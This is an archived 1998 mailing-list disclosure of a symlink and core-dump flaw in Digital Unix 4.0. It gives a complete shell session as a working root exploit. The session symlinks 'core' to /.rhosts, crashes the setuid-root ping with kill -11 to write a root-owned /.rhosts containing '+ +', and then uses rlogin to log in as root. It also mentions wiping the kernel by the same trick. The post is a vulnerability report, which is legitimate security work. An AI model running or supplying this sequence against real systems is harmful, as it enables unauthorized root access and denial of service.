Symlink problem in Digital Unix 4.0, discovered by |-ru5ty- and [SoReN] (28/03/1998)

Starting 2 suid root programs in background, and killing them with the -11 flag, we'll have a core owned by root with our gid and mode 600. Then a symlink is enough to create a file anywhere...like /.rhosts.

rustyat_private
sorenat_private

$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x   1 root     bin        32768 Nov 16  1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
$ kill -11 1337
[1]  Segmentation fault       /usr/sbin/ping somehost (core dumped)
[2] +Segmentation fault       /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw-------   1 root     system    385024 Mar 29 05:17 /.rhosts
##/.rhosts has been created....that's all.##
$ rlogin localhost -l root

This is a very serious problem; it needs a fix as soon as possible. In fact we can have a DoS if we link our core to the kernel.

Other platforms:
SunOS 4.1.x 5.5.x    Doesn't work
Linux 2.0.x          Doesn't work
Digital Unix 4.0d    Doesn't work
Others               (not tested yet)
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:48:02 PDT